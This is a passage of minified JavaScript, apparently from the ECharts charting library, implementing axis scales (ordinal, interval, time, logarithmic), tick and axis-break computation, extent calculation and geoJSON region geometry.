i=n&&n.lookup;if(i)for(var r=0;r<i.from.length;r++)if(t===i.from[r])return i.to[r];return Do(e,t)}function Tb(t,e,n){var i=t.slice();if(i[0]===i[1]){var r=n&&n.ctnShp;if(0!==i[0]){var o=To(i[0]);e[1]||(i[1]+=o/2),i[0]-=o/2}else r?(i[0]=-1,i[1]=1):i[1]=1}return za(i[0])&&za(i[1])||(i[0]=0,i[1]=1),i[1]<i[0]&&i.reverse(),i}function kb(t,e){return ko(Mo(t=t||e,1))}function Cb(t,e,n){var i=cb(t),r=i[0],o=t.count(),a=Math.max((e||0)+1,1);0!==r&&a>1&&o/a>2&&(r=Math.round(Math.ceil(r/a)*a)),r!==i[0]&&l(i[0],!0,!0);for(var s=r;s<=i[1];s+=a)l(s,!1,s===i[0]||s===i[1]);function l(t,e,i){n({value:t,offInterval:e},i)}s-a!==i[1]&&l(i[1],!0,!0)}var Ib=function(t){function e(n){var i=t.call(this)||this;i.type="ordinal",i.parse=e.parse,lb(i,e.decoratedMethods);var r=n.ordinalMeta;r||(r=new rb({})),Y(r)&&(r=new rb({categories:V(r,function(t){return $(t)?t.value:t})})),i._ordinalMeta=r;var o=sb(null,null,n.extent||[0,r.categories.length-1]);return i._mapper=o.mapper,ub(i,o.mapper),i}return n(e,t),e.parse=function(t){return null==t?t=NaN:j(t)?null==(t=this._ordinalMeta.getOrdinal(t))&&(t=NaN):t=ko(t),t},e.prototype.getTicks=function(){var t=[];return Cb(this,0,function(e){t.push(e)}),t},e.prototype.getMinorTicks=function(t){},e.prototype.setSortInfo=function(t){if(null!=t){for(var e=t.ordinalNumbers,n=this._ordinalNumbersByTick=[],i=this._ticksByOrdinalNumber=[],r=0,o=this._ordinalMeta.categories.length,a=So(o,e.length);r<a;++r){i[n[r]=e[r]]=r}for(var s=0;r<o;++r){for(;null!=i[s];)s++;n[r]=s,i[s]=r}}else this._ordinalNumbersByTick=this._ticksByOrdinalNumber=null},e.prototype._getTickNumber=function(t){var e=this._ticksByOrdinalNumber;return e&&t>=0&&t<e.length?e[t]:t},e.prototype.getRawOrdinalNumber=function(t){var e=this._ordinalNumbersByTick;return e&&t>=0&&t<e.length?e[t]:t},e.prototype.getLabel=function(t){if(!this.isBlank()){var e=this.getRawOrdinalNumber(t.value),n=this._ordinalMeta.categories[e];return null==n?"":n+""}},e.prototype.count=function(){var t=cb(this._mapper);return t[1]-t[0]+1},e.prototype.getOrdinalMeta=function(){return this._ordinalMeta},e.type="ordinal",e.decoratedMethods={needTransform:function(){return this._mapper.needTransform()},contain:function(t){return this._mapper.contain(this._getTickNumber(t))&&t>=0&&t<this._ordinalMeta.categories.length},normalize:function(t){return this._mapper.normalize(this._getTickNumber(t))},scale:function(t){return this.getRawOrdinalNumber(ko(this._mapper.scale(t)))},transformIn:function(t,e){return this._mapper.transformIn(this._getTickNumber(t),e)},transformOut:function(t,e){return this.getRawOrdinalNumber(this._mapper.transformOut(t,e))},getExtent:function(){return this._mapper.getExtent()},getExtentUnsafe:function(t,e){return this._mapper.getExtentUnsafe(t,e)},setExtent:function(t,e){return this._mapper.setExtent(t,e)},setExtent2:function(t,e,n){return this._mapper.setExtent2(t,e,n)}},e}(nb);function Db(t,e,n,i){for(var r=t.getTicks({expandToNicedExtent:!0}),o=[],a=t.getExtent(),s=1;s<r.length;s++){var l=r[s],u=r[s-1];if(!u.break&&!l.break){for(var c=0,h=[],p=(l.value-u.value)/e,d=wb(p);c<e-1;){var f=zo(u.value+(c+1)*p,d);f>a[0]&&f<a[1]&&h.push(f),c++}var g=pd();g&&g.pruneTicksByBreak("auto",h,n,function(t){return t},i,a),o.push(h)}}return o}nb.registerClass(Ib);var Ab=function(t){function e(n){var i=t.call(this)||this;i.type="interval",i.parse=e.parse;var r=sb(i,dd(i,n=n||{}),null);return i.brk=r.brk,i._cfg={interval:0,intervalPrecision:2,intervalCount:void 0,niceExtent:void 0},i}return n(e,t),e.parse=function(t){return null==t||""===t?NaN:Number(t)},e.prototype.getConfig=function(){return C(this._cfg)},e.prototype.setConfig=function(t){var e=cb(this);this._cfg=t=C(t),null==t.niceExtent&&(t.niceExtent=e.slice()),null==t.intervalPrecision&&(t.intervalPrecision=wb(t.interval))},e.prototype.getTicks=function(t){t=t||{};var e=this._cfg,n=e.interval,i=cb(this),r=e.niceExtent,o=e.intervalPrecision,a=pd(),s=this.brk,l=a&&s,u=[];if(!n)return u;if("only_break"===t.breakTicks&&l)return a.addBreaksToTicks(u,s.breaks,i),u;i[0]<r[0]&&u.push({value:t.expandToNicedExtent?zo(r[0]-n,o):i[0]});for(var c=function(t,e){return ko((e-t)/n)},h=e.intervalCount,p=r[0],d=0;;d++){if(null==h){if(p>r[1]||!isFinite(p)||!isFinite(r[1]))break}else{if(d>h)break;p=So(p,r[1]),d===h&&(p=r[1])}if(u.push({value:p}),p=zo(p+n,o),s){var f=s.calcNiceTickMultiple(p,c);f>=0&&(p=zo(p+f*n,o))}if(u.length>0&&p===u[u.length-1].value)break;if(u.length>3e3)return[]}var g=u.length?u[u.length-1].value:r[1];return i[1]>g&&u.push({value:t.expandToNicedExtent?zo(g+n,o):i[1]}),l&&a.pruneTicksByBreak(t.pruneByBreak,u,s.breaks,function(t){return t.value},e.interval,i),l&&"none"!==t.breakTicks&&a.addBreaksToTicks(u,s.breaks,i),u},e.prototype.getMinorTicks=function(t){return Db(this,t,fd(this),this._cfg.interval)},e.prototype.getLabel=function(t,e){if(null==t)return"";var n=e&&e.precision;return null==n?n=Vo(t.value)||0:"auto"===n&&(n=this._cfg.intervalPrecision),jd(zo(t.value,n,!0))},e.type="interval",e}(nb);nb.registerClass(Ab);var Pb=function(t){function e(n){var i=t.call(this)||this;i.type="time",i.parse=e.parse,i._locale=n.locale,i._useUTC=n.useUTC,i._interval=0;var r=sb(i,dd(i,n),null);return i.brk=r.brk,i}return n(e,t),e.prototype.getLabel=function(t){return Pd(t.value,Md[function(t){switch(t){case"year":case"month":return"day";case"millisecond":return"millisecond";default:return"second"}}(Dd(this._minLevelUnit))]||Md.second,this._useUTC,this._locale)},e.prototype.getFormattedLabel=function(t,e,n){return function(t,e,n,i,r){var o=null;if(j(n))o=n;else if(X(n)){var a={time:t.time,level:t.time?t.time.level:0},s=pd();s&&s.makeAxisLabelFormatterParamBreak(a,t.break),o=n(t.value,e,a)}else{var l=t.time;if(l){var u=n[l.lowerTimeUnit][l.upperTimeUnit];o=u[Math.min(l.level,u.length-1)]||""}else{var c=Ld(t.value,r);o=n[c][c][0]}}return Pd(new Date(t.value),o,r,i)}(t,e,n,this._locale,this._useUTC)},e.prototype.getTicks=function(t){t=t||{};var e=this._interval,n=cb(this),i=pd(),r=this.brk,o=i&&r,a=[];if(!e)return a;var s=this._useUTC;if(o&&"only_break"===t.breakTicks)return pd().addBreaksToTicks(a,r.breaks,n),a;a=function(t,e,n,i,r,o){var a=3e3,s=kd,l=0;function u(t,e,n,r,s,u,c){for(var h=function(t,e){var n=new Date(0);n[t](1);var i=n.getTime();n[t](1+e);var r=n.getTime()-i;return function(t,e){return Math.max(0,Math.round((e-t)/r))}}(s,t),p=e,d=new Date(p);p<n&&p<=i[1];){if(c.push({value:p}),l++>a){0;break}if(d[s](d[r]()+t),p=d.getTime(),o){var f=o.calcNiceTickMultiple(p,h);f>0&&(d[s](d[r]()+f*t),p=d.getTime())}}c.push({value:p,notAdd:p>i[1]})}function c(t,r,o){var a=[],s=!r.length;if(!Ob(Dd(t),i[0],i[1],n)){s&&(r=[{value:Vb(i[0],t,n)},{value:i[1]}]);for(var l=0;l<r.length-1;l++){var c=r[l].value,h=r[l+1].value;if(c!==h){var p=void 0,d=void 0,f=void 0,g=!1;switch(t){case"year":p=Math.max(1,Math.round(e/_d/365)),d=Rd(n),f=Hd(n);break;case"half-year":case"quarter":case"month":p=Nb(e),d=Nd(n),f=Gd(n);break;case"week":case"half-week":case"day":p=Rb(e),d=Bd(n),f=Wd(n),g=!0;break;case"half-day":case"quarter-day":case"hour":p=Bb(e),d=zd(n),f=Ud(n);break;case"minute":p=zb(e,!0),d=Ed(n),f=Zd(n);break;case"second":p=zb(e,!1),d=Vd(n),f=Yd(n);break;case"millisecond":p=Eb(e),d=Fd(n),f=Xd(n)}h>=i[0]&&c<=i[1]&&u(p,c,h,d,f,g,a),"year"===t&&o.length>1&&0===l&&o.unshift({value:o[0].value-p})}}for(l=0;l<a.length;l++)o.push(a[l])}}for(var h=[],p=[],d=0,f=0,g=0;g<s.length;++g){var v=Dd(s[g]);if(Ad(s[g]))if(c(s[g],h[h.length-1]||[],p),v!==(s[g+1]?Dd(s[g+1]):null)){if(p.length){f=d,p.sort(function(t,e){return t.value-e.value});for(var y=[],m=0;m<p.length;++m){var _=p[m].value;0!==m&&p[m-1].value===_||(y.push(p[m]),_>=i[0]&&_<=i[1]&&d++)}var x=r/e;if(d>1.5*x&&f>x/1.5)break;if(h.push(y),d>x||t===s[g])break}p=[]}}var b=H(V(h,function(t){return H(t,function(t){return t.value>=i[0]&&t.value<=i[1]&&!t.notAdd})}),function(t){return t.length>0}),w=b.length-1,S=[];for(g=0;g<b.length;++g)for(var M=b[g],T=0;T<M.length;++T){var k=Ld(M[T].value,n);S.push({value:M[T].value,time:{level:w-g,upperTimeUnit:k,lowerTimeUnit:k}})}Ga(S,Wa,null),S.sort(function(t,e){return t.value-e.value});var C=S[0],I=S[S.length-1],D=Ld(i[0],n),A=Ld(i[1],n);(!C||C.value>i[0])&&S.unshift({value:i[0],time:{level:0,upperTimeUnit:D,lowerTimeUnit:D},notNice:!0});(!I||I.value<i[1])&&S.push({value:i[1],time:{level:0,upperTimeUnit:A,lowerTimeUnit:A},notNice:!0});return S}(this._minLevelUnit,this._approxInterval,s,n,pb(this),r);var l=Td.length-1,u=0;return E(a,function(t){t.time&&(l=Math.min(l,R(Td,t.time.upperTimeUnit)),u=Math.max(u,t.time.level))}),o&&pd().pruneTicksByBreak(t.pruneByBreak,a,r.breaks,function(t){return t.value},this._approxInterval,n),o&&"none"!==t.breakTicks&&pd().addBreaksToTicks(a,r.breaks,n,function(t){for(var e=Math.max(R(Td,Ld(t.vmin,s)),R(Td,Ld(t.vmax,s))),n=0,i=0;i<Td.length;i++)if(!Ob(Td[i],t.vmin,t.vmax,s)){n=i;break}var r=Math.min(n,l),o=Math.max(r,e);return{level:u,lowerTimeUnit:Td[o],upperTimeUnit:Td[r]}}),a},e.prototype.getMinorTicks=function(t){return Db(this,t,fd(this),this._interval)},e.prototype.setTimeInterval=function(t){this._interval=t.interval,this._approxInterval=t.approxInterval,this._minLevelUnit=t.minLevelUnit},e.parse=function(t){return K(t)?Math.round(t):+jo(t)},e.type="time",e}(nb),Lb=[["second",vd],["minute",yd],["hour",md],["quarter-day",216e5],["half-day",432e5],["day",10368e4],["half-week",3024e5],["week",6048e5],["month",26784e5],["quarter",8208e6],["half-year",xd/2],["year",xd]];function Ob(t,e,n,i){return Od(new Date(e),t,i).getTime()===Od(new Date(n),t,i).getTime()}function Rb(t,e){return(t/=_d)>16?16:t>7.5?7:t>3.5?4:t>1.5?2:1}function Nb(t){return(t/=2592e6)>6?6:t>3?3:t>2?2:1}function Bb(t){return(t/=md)>12?12:t>6?6:t>3.5?4:t>2?2:1}function zb(t,e){return(t/=e?yd:vd)>30?30:t>20?20:t>15?15:t>10?10:t>5?5:t>2?2:1}function Eb(t){return Mo($o(t,!0),1)}function Vb(t,e,n){var i=Math.max(0,R(Td,e)-1);return Od(new Date(t),Td[i],n).getTime()}nb.registerClass(Pb);var Fb=function(t){function e(n){var i=t.call(this)||this;i.type="log",i.parse=Ab.parse,i.base=n.logBase||10;var r=[],o=[],a=i._lookup={from:r,to:o};r[0]=r[1]=o[0]=o[1]=NaN,lb(i,e.mapperMethods);var s=pd(),l=n.breakOption,u={lookup:a};return s&&s.parseAxisBreakOptionInwardTransform(l,i,{noNegative:!0},2,u),i.powStub=new Ab({breakParsed:u.original}),i.intervalStub=new Ab({breakParsed:u.transformed}),ub(i,i.intervalStub),i}return n(e,t),e.prototype.getTicks=function(t){var e=this.base,n=this.powStub,i=pd(),r=this.intervalStub,o={lookup:{from:r.getExtent(),to:n.getExtent()}};return V(r.getTicks(t||{}),function(t){var r,a=Mb(t.value,e,o);if(i){var s=i.getTicksBreakOutwardTransform(this,t,fd(n),this._lookup);s&&(r=s.vBreak,a=s.tickVal)}return{value:a,break:r}},this)},e.prototype.getMinorTicks=function(t){return Db(this,t,fd(this.powStub),this.intervalStub.getConfig().interval)},e.prototype.getLabel=function(t,e){return this.intervalStub.getLabel(t,e)},e.type="log",e.mapperMethods={needTransform:function(){return!0},normalize:function(t){return this.intervalStub.normalize(Sb(t,this.base))},scale:function(t){return Mb(this.intervalStub.scale(t),this.base,null)},transformIn:function(t,e){return t=Sb(t,this.base),e&&2===e.depth?t:this.intervalStub.transformIn(t,e)},transformOut:function(t,e){var n=e?e.depth:null;return Hb.depth=n,Gb.lookup=this._lookup,Mb(2===n?t:this.intervalStub.transformOut(t,Hb),this.base,Gb)},contain:function(t){return this.powStub.contain(t)},setExtent:function(t,e){this.setExtent2(0,t,e)},setExtent2:function(t,e,n){if(!(!Ea(e,n)||e<=0||n<=0)){var i=Wb,r=Wb;if(0===t){var o=this._lookup;i=o.to,r=o.from}this.powStub.setExtent2(t,i[0]=e,i[1]=n);var a=this.base;this.intervalStub.setExtent2(t,r[0]=Sb(e,a),r[1]=Sb(n,a))}},getFilter:function(){return{g:0}},sanitize:function(t,e){return Ea(e[0],e[1])&&ia(t)&&t<=0&&(t=e[0]),t},getDefaultStartValue:function(){return 1},getExtent:function(){return this.powStub.getExtent()},getExtentUnsafe:function(t,e){return null===e?this.powStub.getExtentUnsafe(t,null):this.intervalStub.getExtentUnsafe(t,e)}},e}(nb);nb.registerClass(Fb);var Hb={},Gb={},Wb=[],Ub={value:1,category:1,time:1,log:1},Zb=Ta();function Yb(t){var e=t.get("type");return null!=e&&(wt(Ub,e)||nb.getClass(e))||(e="value"),e}function Xb(t,e,n){var i;switch(pd()&&(i=nw(t,e,n)),e){case"category":return new Ib({ordinalMeta:t.getOrdinalMeta?t.getOrdinalMeta():t.getCategories(),extent:[1/0,-1/0]});case"time":return new Pb({locale:t.ecModel.getLocaleModel(),useUTC:t.ecModel.get("useUTC"),breakOption:i});case"log":return new Fb({logBase:t.get("logBase"),breakOption:i});case"value":return new Ab({breakOption:i});default:return new(nb.getClass(e)||Ab)({})}}var jb=1,qb=2,Kb=3;function $b(t){var e=t.getLabelModel().get("formatter");if("time"===t.type){var n=Cd(e);return function(e,i){return t.scale.getFormattedLabel(e,i,n)}}if(j(e))return function(n){var i=t.scale.getLabel(n);return e.replace("{value}",null!=i?i:"")};if(X(e)){if("category"===t.type)return function(n,i){return e(Qb(t,n),n.value-t.scale.getExtent()[0],null)};var i=pd();return function(n,r){var o=null;return i&&(o=i.makeAxisLabelFormatterParamBreak(o,n.break)),e(Qb(t,n),r,o)}}return function(e){return t.scale.getLabel(e)}}function Qb(t,e){var n=t.scale;return xb(n)?n.getLabel(e):e.value}function Jb(t){var e=t.get("interval");return null==e?"auto":e}function tw(t){return"middle"===t||"center"===t}function ew(t){return t.getShallow("show")}function nw(t,e,n){var i=t.get("breaks",!0);if(null!=i){if(!pd())return void 0;if(!n||!function(t){return"category"!==t}(e))return;return i}}function iw(t,e,n,i,r,o){var a,s,l=_b(t),u=l?t.intervalStub:t;if(u.setExtent(i[0],i[1]),l){var c=t.powStub,h={depth:2},p=t.transformOut(i[0],h),d=t.transformOut(i[1],h),f=(s=i,[(a=n)[0]!==s[0],a[1]!==s[1]]);e[0]&&!f[0]&&(p=r[0]),e[1]&&!f[1]&&(d=r[1]),c.setExtent(p,d)}u.setConfig(o)}function rw(t,e){return xb(t)?t.getRawOrdinalNumber(e.value):e.value}function ow(t,e){return xb(t)&&!!e.get("boundaryGap")}var aw=function(){function t(){}return t.prototype.needIncludeZero=function(){return!this.option.scale},t.prototype.getCoordSysModel=function(){},t}(),sw=Fa(),lw="|&",uw=Ta(),cw=Ta();function hw(t,e){var n=t.model,i=uw(pm(n.ecModel)).keyed,r=i&&i.get(e);return r&&r.get(n.uid)}function pw(t,e){return fw(hw(t,e))}function dw(t,e){var n=uw(pm(t)).keyed;n&&n.each(function(t,n){t.each(function(t,i){e(t,n,i)})})}function fw(t){return{liPosMinGap:t?t.liPosMinGap:void 0}}function gw(t,e,n){var i=hw(t,e);i&&vw(t.model.ecModel,i.sers,n)}function vw(t,e,n){if(e)for(var i=0;i<e.length;i++){var r=e[i];t.isSeriesFiltered(r)||n(r)}}function yw(t,e){var n=t.model,i=uw(pm(n.ecModel)).keys;i&&E(i.get(n.uid),function(t){e(t)})}function mw(t){var e=cw(hm(t)),n=e.keyed||(e.keyed=mt());dw(t,function(e,i,r){var o=n.get(i)||n.set(i,mt()),a=o.get(r)||o.set(r,{});e.metrics.liPosMinGap&&_w.liPosMinGap(t,e,a)})}var _w={};function xw(t,e,n){if(t){var i=e.ecModel,r=uw(pm(i)),o=t.model.uid,a=r.axSer||(r.axSer=mt()),s=a.get(o)||a.set(o,[]);s.push(e);var l=e.subType,u=e.getBaseAxis()===t,c=ww.get(bw(l,u,n))||ww.get(bw(l,u,null));if(c){var h=r.keyed||(r.keyed=mt()),p=r.keys||(r.keys=mt()),d=c.key,f=h.get(d)||h.set(d,mt()),g=f.get(o);g||((g=f.set(o,{axis:t,sers:[],serByIdx:[]})).metrics=c.getMetrics(t),(p.get(o)||p.set(o,[])).push(d)),g.sers.push(e),g.serByIdx[e.seriesIndex]=e}}}function bw(t,e,n){return t+lw+at(e,!0)+lw+(n||"")}var ww=mt(),Sw=Ta(),Mw=function(){function t(t,e,n,i,r){var o,a=xb(t),s=a?e.getCategories().length:null;if(a){var l=e.getCategories(!0);o=l&&!l.length}var u=n.slice();(yb(t)||_b(t)||mb(t))&&(Na(u,kw(t,e.get("dataMin",!0))),Ba(u,kw(t,e.get("dataMax",!0)))),function(t){var e=t[1]-t[0];return isFinite(e)&&e>=0}(u)||(u[0]=u[1]=NaN);var c=[],h=[!1,!1],p=e.get("min",!0);"dataMin"===p?(c[0]=u[0],h[0]=!0):(c[0]=kw(t,X(p)?p({min:u[0],max:u[1]}):p),h[0]=null!=c[0]);var d=e.get("max",!0);"dataMax"===d?(c[1]=u[1],h[1]=!0):(c[1]=kw(t,X(d)?d({min:u[0],max:u[1]}):d),h[1]=null!=c[1]);var f=function(t,e){var n;if(xb(t))n=[0,0];else{var i=e.get("boundaryGap");"boolean"==typeof i&&(i=null),n=Y(i)?i:[i,i]}return[Cw(n[0]),Cw(n[1])]}(t,e),g=a?null:u[1]-u[0]||Math.abs(u[0]);null==c[0]&&(c[0]=a?o?u[0]:s?0:NaN:u[0]-f[0]*g),null==c[1]&&(c[1]=a?o?u[1]:s?s-1:NaN:u[1]+f[1]*g),!za(c[0])&&(c[0]=NaN),!za(c[1])&&(c[1]=NaN);var v=o||rt(c[0])||rt(c[1])||a&&!s,y=yb(t),m=y&&e.needIncludeZero&&e.needIncludeZero();m&&(c[0]>0&&c[1]>0&&!h[0]&&(c[0]=0),c[0]<0&&c[1]<0&&!h[1]&&(c[1]=0));var _=!1;c[0]>c[1]&&(c.reverse(),_=!0);var x=kw(t,e.get("startValue",!0)),b=null!=x;!ia(x)&&i&&(x=t.getDefaultStartValue?t.getDefaultStartValue():0),ia(x)&&(b||!y||m)&&(x<c[0]&&!h[0]?(c[0]=x,h[0]=!0):x>c[1]&&!h[1]&&(c[1]=x,h[1]=!0)),Tw(this._i={scale:t,dataMM:u,noZoomEffMM:c,zoomMM:[],fixMM:h,zoomFixMM:[!1,!1],startValue:x,isBlank:v,incl0:m,tggAxInv:_,ctnShp:r},c)}return t.prototype.makeNoZoom=function(){return this._i.noZoomEffMM.slice()},t.prototype.makeFinal=function(){var t=this._i,e=t.zoomMM,n=t.noZoomEffMM,i=t.zoomFixMM,r=t.fixMM,o={fixMM:r,zoomFixMM:i,isBlank:t.isBlank,incl0:t.incl0,tggAxInv:t.tggAxInv,ctnShp:t.ctnShp,effMM:n.slice()},a=o.effMM;return null!=e[0]&&(a[0]=e[0],r[0]=i[0]=!0),null!=e[1]&&(a[1]=e[1],r[1]=i[1]=!0),Tw(t,a),o},t.prototype.makeRenderInfo=function(){return{startValue:this._i.startValue}},t.prototype.setZoomMM=function(t,e){this._i.zoomMM[t]=e},t}();function Tw(t,e){var n=t.scale,i=t.dataMM;n.sanitize&&(e[0]=n.sanitize(e[0],i),e[1]=n.sanitize(e[1],i),Va(e))}function kw(t,e){return null==e?null:rt(e)?NaN:t.parse(e)}function Cw(t){return qr("boolean"==typeof t?0:t,1)||0}function Iw(t){var e=Sw(t.scale);return e.extent||(e.extent=[1/0,-1/0]),e}function Dw(t,e){var n=t.scale,i=t.model,r=t.dim;n.rawExtentInfo||function(t,e,n,i,r){var o=Iw(e),a=o.extent,s=!1;!function(t,e){var n=t.model.ecModel,i=uw(pm(n)).axSer;i&&vw(n,i.get(t.model.uid),e)}(e,function(i){if(i.boxCoordinateSystem){var r=uf(i).coord,l=o.dimIdxInCoord;if(l>=0){if(Y(r)){var u=r[l];null==u||Y(u)||Ra(a,t.parse(u))}}else 0}else if(i.coordinateSystem){var c=i.getData();if(c){var h=t.getFilter?t.getFilter():null;E(function(t,e){var n={};return E(t.mapDimensionsAll(e),function(e){n[tb(t,e)]=!0}),W(n)}(c,n),function(t){var e,n;e=a,Ea((n=c.getApproximateExtent(t,h))[0],n[1])&&(n[0]<e[0]&&(e[0]=n[0]),n[1]>e[1]&&(e[1]=n[1]))})}i.__requireStartValue&&i.__requireStartValue(e)&&(s=!0)}});var l=function(t,e,n){var i=ow(t,n),r=n.get("containShape",!0);null!=r||i||(r=!0);if(!r)return!1;var o=!1;return yw(e,function(t){o=!!Pw.get(t)||o}),o}(t,e,i),u=new Mw(t,i,a,s,l);Aw(t,u,r),o.extent=null}(n,t,r,i,e)}function Aw(t,e,n){t.rawExtentInfo=e,e.from=n}var Pw=mt();function Lw(t,e,n,i,r){t.rawExtentInfo||function(t,e){var n=t.scale;Aw(n,new Mw(n,t.model,e,!1,!1),3)}({scale:t,model:e},r||[1/0,-1/0]);var o=t.rawExtentInfo.makeFinal(),a=o.effMM;return t.setExtent(a[0],a[1]),t.setBlank(o.isBlank),i&&o.tggAxInv&&n&&!n.get("legacyMinMaxDontInverseAxis")&&(i.inverse=!i.inverse),o}function Ow(t,e,n,i){var r;if(n.ctnShp&&(yw(t,function(e){var n=Pw.get(e);if(n){var o=n(t,i);o&&(Na(r=r||[0,0],o[0]),Ba(r,o[1]),function(t){Zb(t).noOnMyZero=!0}(t))}}),r)){var o=e.getExtent();if(xb(e))t.onBand||e.setExtent2(1,So(o[0],o[0]+r[0]),Mo(o[1],o[1]+r[1]));else{var a=o.slice();n.zoomFixMM[0]||(a[0]=So(a[0],e.transformOut(e.transformIn(a[0],null)+r[0],null))),n.zoomFixMM[1]||(a[1]=Mo(a[1],e.transformOut(e.transformIn(a[1],null)+r[1],null))),(a[0]<o[0]||a[1]>o[1])&&e.setExtent2(1,a[0],a[1])}}}function Rw(t,e){var n=_b(t),i=n?t.intervalStub:t,r=e.fixMinMax||[],o=n?t.getExtent():null,a=i.getExtent(),s=Tb(a,r,e.rawExtentResult);i.setExtent(s[0],s[1]),s=i.getExtent();var l=n?function(t,e){var n=kb(e.splitNumber,10),i=t.getExtent(),r=pb(t);0;var o=Mo(qo(r),1);n/r*o<=.5&&(o*=10);var a=wb(o),s=[zo(Io(i[0]/o)*o,a),zo(Co(i[1]/o)*o,a)];return{intervalPrecision:a,interval:o,niceExtent:s}}(i,e):function(t,e){var n=kb(e.splitNumber,5),i=pb(t);0;var r=e.minInterval,o=e.maxInterval,a=$o(i/n,!0);null!=r&&a<r&&(a=r);null!=o&&a>o&&(a=o);var s=wb(a),l=t.getExtent(),u=[zo(Io(l[0]/a)*a,s),zo(Co(l[1]/a)*a,s)];return{interval:a,intervalPrecision:s,niceExtent:u}}(i,e),u=l.intervalPrecision,c=l.interval,h=e.userInterval;null!=h&&(l.interval=h,l.intervalPrecision=wb(h)),r[0]||(s[0]=zo(Co(s[0]/c)*c,u)),r[1]||(s[1]=zo(Io(s[1]/c)*c,u)),null!=h&&(l.niceExtent=s.slice()),iw(t,r,a,s,o,l)}function Nw(t){var e=t.scale,n=t.model,i=n.axis,r=n.ecModel;Bw(e,n,i,r,null)}function Bw(t,e,n,i,r){var o=Lw(t,e,i,n,r),a=yb(t)||mb(t);!function(t,e){zw[t.type](t,e)}(t,{splitNumber:e.get("splitNumber"),fixMinMax:o.fixMM,userInterval:e.get("interval"),minInterval:a?e.get("minInterval"):null,maxInterval:a?e.get("maxInterval"):null,rawExtentResult:o}),n&&i&&Ow(n,t,o,i)}var zw={interval:Rw,log:Rw,time:function(t,e){var n=t.getExtent();if(n[0]===n[1]&&(n[0]-=_d,n[1]+=_d),n[1]===-1/0&&n[0]===1/0){var i=new Date;n[1]=+new Date(i.getFullYear(),i.getMonth(),i.getDate()),n[0]=n[1]-_d}t.setExtent(n[0],n[1]);var r=kb(e.splitNumber,10),o=pb(t)/r,a=e.minInterval,s=e.maxInterval;null!=a&&o<a&&(o=a),null!=s&&o>s&&(o=s);var l=Lb.length,u=Math.min(function(t,e,n,i){for(;n<i;){var r=n+i>>>1;t[r][1]<e?n=r+1:i=r}return n}(Lb,o,0,l),l-1),c=Lb[u][1],h=Lb[Math.max(u-1,0)][0];t.setTimeInterval({approxInterval:o,interval:c,minLevelUnit:h})},ordinal:St};var Ew={isDimensionStacked:Jx,enableDataStack:Qx,getStackedDimension:tb};var Vw=Object.freeze({__proto__:null,createList:function(t){return eb(null,t)},getLayoutRect:yf,dataStack:Ew,createScale:function(t,e){var n=e;e instanceof td||(n=new td(e));var i=Xb(n,Yb(n),!1);return t[1]<t[0]&&(t=t.slice().reverse()),Bw(i,n,null,null,t),i},mixinAxisModelCommonMethods:function(t){B(t,aw)},getECData:hu,createTextStyle:function(t,e){return Op(t,null,null,"normal"!==(e=e||{}).state)},createDimensions:function(t,e){return Xx(t,e).dimensions},createSymbol:Mm,enableHoverEmphasis:hc});function Fw(t,e){return Math.abs(t-e)<1e-8}function Hw(t,e,n){var i=0,r=t[0];if(!r)return!1;for(var o=1;o<t.length;o++){var a=t[o];i+=Sl(r[0],r[1],a[0],a[1],e,n),r=a}var s=t[0];return Fw(r[0],s[0])&&Fw(r[1],s[1])||(i+=Sl(r[0],r[1],s[0],s[1],e,n)),0!==i}var Gw=[];function Ww(t,e){for(var n=0;n<t.length;n++)Ut(t[n],t[n],e)}function Uw(t,e,n,i){for(var r=0;r<t.length;r++){var o=t[r];i&&(o=i.project(o)),o&&isFinite(o[0])&&isFinite(o[1])&&(Zt(e,e,o),Yt(n,n,o))}}var Zw=function(){function t(t){this.name=t}return t.prototype.setCenter=function(t){this._center=t},t.prototype.getCenter=function(){var t=this._center;return t||(t=this._center=this.calcCenter()),t},t}(),Yw=function(t,e){this.type="polygon",this.exterior=t,this.interiors=e},Xw=function(t){this.type="linestring",this.points=t},jw=function(t){function e(e,n,i){var r=t.call(this,e)||this;return r.type="geoJSON",r.geometries=n,r._center=i&&[i[0],i[1]],r}return n(e,t),e.prototype.calcCenter=function(){for(var t,e=this.geometries,n=0,i=0;i<e.length;i++){var r=e[i],o=r.exterior,a=o&&o.length;a>n&&(t=r,n=a)}if(t)return function(t){for(var e=0,n=0,i=0,r=t.length,o=t[r-1][0],a=t[r-1][1],s=0;s<r;s++){var l=t[s][0],u=t[s][1],c=o*u-l*a;e+=c,n+=(o+l)*c,i+=(a+u)*c,o=l,a=u}return e?[n/e/3,i/e/3,e]:[t[0][0]||0,t[0][1]||0]}(t.exterior);var s=this.getBoundingRect();return[s.x+s.width/2,s.y+s.height/2]},e.prototype.getBoundingRect=function(t){var e=this._rect;if(e&&!t)return e;var n=[1/0,1/0],i=[-1/0,-1/0];return E(this.geometries,function(e){"polygon"===e.type?Uw(e.exterior,n,i,t):E(e.points,function(e){Uw(e,n,i,t)})}),isFinite(n[0])&&isFinite(n[1])&&isFinite(i[0])&&isFinite(i[1])||(n[0]=n[1]=i[0]=i[1]=0),e=new Ue(n[0],n[1],i[0]-n[0],i[1]-n[1]),t||(this._rect=e),e},e.prototype.contain=function(t){var e=this.getBoundingRect(),n=this.geometries;if(!e.contain(t[0],t[1]))return!1;t:for(var i=0,r=n.length;i<r;i++){var o=n[i];if("polygon"===o.type){var a=o.exterior,s=o.interiors;if(Hw(a,t[0],t[1])){for(var l=0;l<(s?s.length:0);l++)if(Hw(s[l],t[0],t[1]))continue t;return!0}}}return!1},e.prototype.transformTo=function(t,e,n,i){var r=this.getBoundingRect(),o=r.width/r.height;n?i||(i=n/o):n=o*i;for(var a=new Ue(t,e,n,i),s=r.calculateTransform(a),l=this.geometries,u=0;u<l.length;u++){var c=l[u];"polygon"===c.type?(Ww(c.exterior,s),E(c.interiors,function(t){Ww(t,s)})):E(c.points,function(t){Ww(t,s)})}(r=this._rect).copy(a),this._center=[r.x+r.width/2,r.y+r.height/2]},e.prototype.cloneShallow=function(t){null==t&&(t=this.name);var n=new e(t,this.geometries,this._center);return n._rect=this._rect,n.transformTo=null,n},e}(Zw);!function(t){function e(e,n){var i=t.call(this,e)||this;return i.type="geoSVG",i._elOnlyForCalculate=n,i}n(e,t),e.prototype.calcCenter=function(){for(var t=this._elOnlyForCalculate,e=t.getBoundingRect(),n=[e.x+e.width/2,e.y+e.height/2],i=we(Gw),r=t;r&&!r.isGeoSVGGraphicRoot;)Me(i,r.getLocalTransform(),i),r=r.parent;return Ie(i,i),Ut(n,n,i),n}}(Zw);function qw(t,e,n){for(var 